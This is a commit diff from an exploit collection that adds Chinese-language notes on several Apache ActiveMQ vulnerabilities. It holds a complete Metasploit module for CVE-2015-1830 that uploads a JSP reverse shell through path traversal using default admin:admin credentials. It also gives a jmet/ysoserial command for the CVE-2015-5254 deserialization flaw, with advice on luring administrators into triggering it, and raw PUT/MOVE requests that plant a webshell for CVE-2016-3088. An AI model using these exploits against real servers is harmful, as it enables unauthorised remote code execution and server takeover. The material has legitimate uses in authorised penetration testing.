Skip to content

Commit d961aa1

Browse files
committedJan 13, 2022
add active MQ exp
1 parent 91bacfc commit d961aa1

File tree

13 files changed

+310
-0
lines changed

13 files changed

+310
-0
lines changed
 
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
ActiveMQ物理路径泄漏漏洞
2+
========================
3+
4+
一、漏洞简介
5+
------------
6+
7+
ActiveMQ默认开启PUT请求,当开启PUT时,构造好Payload(即不存在的目录),Response会返回相应的物理路径信息
8+
9+
二、漏洞影响
10+
------------
11+
12+
三、复现过程
13+
------------
14+
15+
Request Raw:
16+
PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1
17+
Host: 192.168.197.25:8161
18+
Authorization: Basic YWRtaW46YWRtaW4=
19+
Content-Length: 4
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,150 @@
1+
CVE-2015-1830)ActiveMQ 路径遍历导致未经身份验证的rce
2+
=======================================================
3+
4+
一、漏洞简介
5+
------------
6+
7+
Windows 5.11.2之前的Apache ActiveMQ
8+
5.x中blob消息的文件服务器上载/下载功能中的目录遍历漏洞允许远程攻击者通过未指定的向量在任意目录中创建JSP文件。
9+
10+
二、漏洞影响
11+
------------
12+
13+
ActiveMQ 5.11.1
14+
15+
三、复现过程
16+
------------
17+
18+
### msf poc
19+
20+
> 直接在msf里面搜索就行了,如果没有请更新msf版本,或者手动复制下面的脚本到msf目录下。
21+
22+
##
23+
# This module requires Metasploit: https://metasploit.com/download
24+
# Current source: https://github.com/rapid7/metasploit-framework
25+
##
26+
27+
class MetasploitModule < Msf::Exploit::Remote
28+
Rank = ExcellentRanking
29+
30+
include Msf::Exploit::Remote::HttpClient
31+
32+
def initialize(info = {})
33+
super(update_info(info,
34+
'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
35+
'Description' => %q{
36+
This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache
37+
ActiveMQ 5.x before 5.11.2 for Windows.
38+
39+
The module tries to upload a JSP payload to the /admin directory via the traversal
40+
path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ
41+
credentials admin:admin (or other credentials provided by the user). It then issues
42+
an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
43+
payload and obtain a shell.
44+
},
45+
'Author' =>
46+
[
47+
'David Jorm', # Discovery and exploit
48+
'Erik Wynter' # @wyntererik - Metasploit
49+
],
50+
'References' =>
51+
[
52+
[ 'CVE', '2015-1830' ],
53+
[ 'EDB', '40857'],
54+
[ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
55+
],
56+
'Privileged' => false,
57+
'Platform' => %w{ win },
58+
'Targets' =>
59+
[
60+
[ 'Windows Java',
61+
{
62+
'Arch' => ARCH_JAVA,
63+
'Platform' => 'win'
64+
}
65+
],
66+
],
67+
'DisclosureDate' => '2015-08-19',
68+
'License' => MSF_LICENSE,
69+
'DefaultOptions' => {
70+
'RPORT' => 8161,
71+
'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
72+
},
73+
'DefaultTarget' => 0))
74+
75+
register_options([
76+
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
77+
OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']),
78+
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
79+
OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])
80+
])
81+
end
82+
83+
def check
84+
print_status("Running check...")
85+
testfile = Rex::Text::rand_text_alpha(10)
86+
testcontent = Rex::Text::rand_text_alpha(10)
87+
88+
send_request_cgi({
89+
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
90+
'headers' => {
91+
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
92+
},
93+
'method' => 'PUT',
94+
'data' => "<% out.println(\"#{testcontent}\");%>"
95+
})
96+
97+
res1 = send_request_cgi({
98+
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
99+
'headers' => {
100+
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
101+
},
102+
'method' => 'GET'
103+
})
104+
105+
if res1 && res1.body.include?(testcontent)
106+
send_request_cgi(
107+
opts = {
108+
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
109+
'headers' => {
110+
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
111+
},
112+
'method' => 'DELETE'
113+
},
114+
timeout = 1
115+
)
116+
return Exploit::CheckCode::Vulnerable
117+
end
118+
119+
Exploit::CheckCode::Safe
120+
end
121+
122+
def exploit
123+
print_status("Uploading payload...")
124+
testfile = Rex::Text::rand_text_alpha(10)
125+
vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
126+
127+
send_request_cgi({
128+
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
129+
'headers' => {
130+
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
131+
},
132+
'method' => 'PUT',
133+
'data' => payload.encoded
134+
})
135+
136+
print_status("Payload sent. Attempting to execute the payload.")
137+
res = send_request_cgi({
138+
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
139+
'headers' => {
140+
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
141+
},
142+
'method' => 'GET'
143+
})
144+
if res && res.code == 200
145+
print_good("Payload executed!")
146+
else
147+
fail_with(Failure::PayloadFailed, "Failed to execute the payload")
148+
end
149+
end
150+
end
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
CVE-2015-5254)ActiveMQ 反序列化漏洞
2+
======================================
3+
4+
一、漏洞简介
5+
------------
6+
7+
Apache ActiveMQ
8+
5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java
9+
Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
10+
11+
二、漏洞影响
12+
------------
13+
14+
Apache ActiveMQ 5.13.0之前的5.x版本
15+
16+
三、复现过程
17+
------------
18+
19+
漏洞利用过程如下:
20+
21+
1. 构造(可以使用ysoserial)可执行命令的序列化对象
22+
23+
2. 作为一个消息,发送给目标61616端口
24+
25+
3. 访问web管理页面,读取消息,触发漏洞
26+
27+
使用[jmet](https://github.com/ianxtianxt/jmet)进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。
28+
29+
jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。
30+
31+
执行:
32+
33+
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
34+
35+
![](./resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId25.png)
36+
37+
此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过`http://your-ip:8161/admin/browse.jsp?JMSDestination=event`看到这个队列中所有消息:
38+
39+
![](./resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId26.png)
40+
41+
点击查看这条消息即可触发命令执行,此时进入容器`docker-compose exec activemq bash`,可见/tmp/success已成功创建,说明漏洞利用成功:
42+
43+
![](./resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId27.png)
44+
45+
将命令替换成弹shell语句再利用:
46+
47+
![](./resource/(CVE-2015-5254)ActiveMQ反序列化漏洞/media/rId28.png)
48+
49+
值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。
50+
51+
参考链接
52+
--------
53+
54+
> https://vulhub.org/\#/environments/activemq/CVE-2015-5254/
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,67 @@
1+
CVE-2016-3088)ActiveMQ应用漏洞
2+
=================================
3+
4+
一、漏洞简介
5+
------------
6+
7+
ActiveMQ是一款流行的开源消息服务器。默认情况下,ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。
8+
9+
二、漏洞影响
10+
------------
11+
12+
Apache ActiveMQ 5.x \~ 5.14.0
13+
14+
三、复现过程
15+
------------
16+
17+
漏洞是需要登录之后才可以执行
18+
19+
漏洞利用就是/fileserver/有put上传权限,/admin/有执行权限,可找到绝对路径,使用move移动文件到/admin/
20+
21+
下面就是两步走,先是利用put上传文件到/fileserver/,然后移动到move到admin下面
22+
23+
所有返回为204就代表是成功,有个坑点:不要put同文件名的文件上去
24+
25+
如果上传不解析的话,则是证明没有权限!!!
26+
27+
如果上传不解析的话,则是证明没有权限!!!
28+
29+
如果上传不解析的话,则是证明没有权限!!!
30+
31+
ActiveMQ默认开启PUT方法,当fileserver存在时我们可以上传jspwebshell。
32+
33+
![](./resource/(CVE-2016-3088)ActiveMQ应用漏洞/media/rId24.png)
34+
35+
PUT /fileserver/shell.jsp HTTP/1.1
36+
Host: 192.168.197.25:8161
37+
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
38+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
39+
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
40+
Accept-Encoding: gzip, deflate
41+
Connection: keep-alive
42+
Upgrade-Insecure-Requests: 1
43+
Authorization: Basic YWRtaW46YWRtaW4=
44+
45+
shell
46+
47+
利用 MOVE 方法将 Webshell 移入 admin/ 目录
48+
49+
![](./resource/(CVE-2016-3088)ActiveMQ应用漏洞/media/rId25.png)
50+
51+
Request Raw:
52+
MOVE /fileserver/shell.jsp HTTP/1.1
53+
Destination:file:/data/apache-activemq-5.7.0/webapps/admin/shell.jsp
54+
Host: 192.168.197.25:8161
55+
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
56+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
57+
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
58+
Accept-Encoding: gzip, deflate
59+
Connection: keep-alive
60+
Upgrade-Insecure-Requests: 1
61+
Authorization: Basic YWRtaW46YWRtaW4=
62+
Content-Length: 17
63+
Content-Length: 0
64+
65+
shell
66+
67+
![](./resource/(CVE-2016-3088)ActiveMQ应用漏洞/media/rId26.png)
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
CVE-2017-15709)ActiveMQ 信息泄漏漏洞
2+
=======================================
3+
4+
一、漏洞简介
5+
------------
6+
7+
Apache
8+
ActiveMQ默认消息队列61616端口对外,61616端口使用了OpenWire协议,这个端口会暴露服务器相关信息,这些相关信息实际上是debug信息。
9+
10+
会返回应用名称,JVM,操作系统以及内核版本等信息。
11+
12+
二、漏洞影响
13+
------------
14+
15+
apache-activemq-5.15.0 to apache-activemq-5.15.2apache-activemq-5.14.0 to apache-activemq-5.14.5
16+
17+
三、复现过程
18+
------------
19+
20+
![](./resource/(CVE-2017-15709)ActiveMQ信息泄漏漏洞/media/rId24.png)

0 commit comments

Comments
 (0)
Please sign in to comment.